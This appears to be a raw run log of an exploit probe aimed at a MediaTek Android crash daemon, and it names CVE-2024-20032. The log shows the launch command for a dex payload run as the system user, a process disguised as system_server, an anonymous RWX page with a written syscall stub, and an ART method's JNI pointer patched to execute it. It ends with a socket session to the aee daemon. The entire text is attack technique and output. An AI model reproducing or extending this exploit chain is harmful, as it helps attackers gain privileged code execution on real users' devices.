command=CLASSPATH=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex app_process64 /system/bin AeeSessionProbe --socket=com.mtk.aee.aed_64 --ind=12 --class=13 --spawn-named=system_server --flags=2000 --no-dump-check --max-reqs=20
probe=aee-session
dex_md5=a41ffab5cc2d2ad03e146e48b9f5bc3c
dex_sha256=d1572f8085f0f2807f4eee18241f2f08dc9ff1c4f5556d006fa9023a1fe5da70
remote_dex=/data/data/com.android.settings/cache/apusys_ioctl_probe.dex
shell_port=127.0.0.1:48888
exit_status=0

uid=1000(system) gid=1000(system) groups=1000(system),3003(inet) context=u:r:system_app:s0
u:r:system_app:s0
a41ffab5cc2d2ad03e146e48b9f5bc3c  /data/data/com.android.settings/cache/apusys_ioctl_probe.dex
[spawn_named] sh -c 'exec -a system_server sleep 90' -> pid=28852
[spawn_named] PID=28852 cmdline=''
[AeeSessionProbe] CVE-2024-20032 session driver
[AeeSessionProbe] uid=1000 pid=28838 target_pid=28852 class=13 ind=12 flags=0x2000 payload=false
[+] Scratch buffer at 0x728ddd9000
[*] Trying anonymous PROT_RWX mmap...
[+] Anonymous RWX page at 0x728dda3000
[+] Wrote syscall stub: JNI@+0x00 (36B), call stub JNI@+0x80 (40B); entry_point left untouched
[*] ArtMethod for nativeSyscall at 0x7284b02c88
    access_flags = 0x10000108 [NATIVE]
    data (JNI ptr) = 0x6fd721a2c0
    entry_point    = 0x1038000876d7c578
[*] Patching data_ (JNI) → 0x728dda3000
    data_       = 0x728dda3000 ✓
    entry_point = 0x1038000876d7c578 (unchanged)
[+] ArtMethod patched
[+] Syscall infrastructure ready

[session] @com.mtk.aee.aed_64 connected peer_uid=0
[session] IND ind=12 class=13 pid=28852 flags=0x2000 payload=0
[session] IND bytes: 02 00 00 00 0c 00 00 00 b4 70 00 00 0d 00 00 00 00 00 00 00 00 20 00 00
[session] REQ#0 type=2 cmd=16(IND_LOG_CLOSE) seq=0 payload=0
[session] daemon IND cmd=16(IND_LOG_CLOSE) — session CLOSED
[session] no REQs on @com.mtk.aee.aed_64 (daemon may need crash state)

[phase-check] skipped (--no-dump-check)
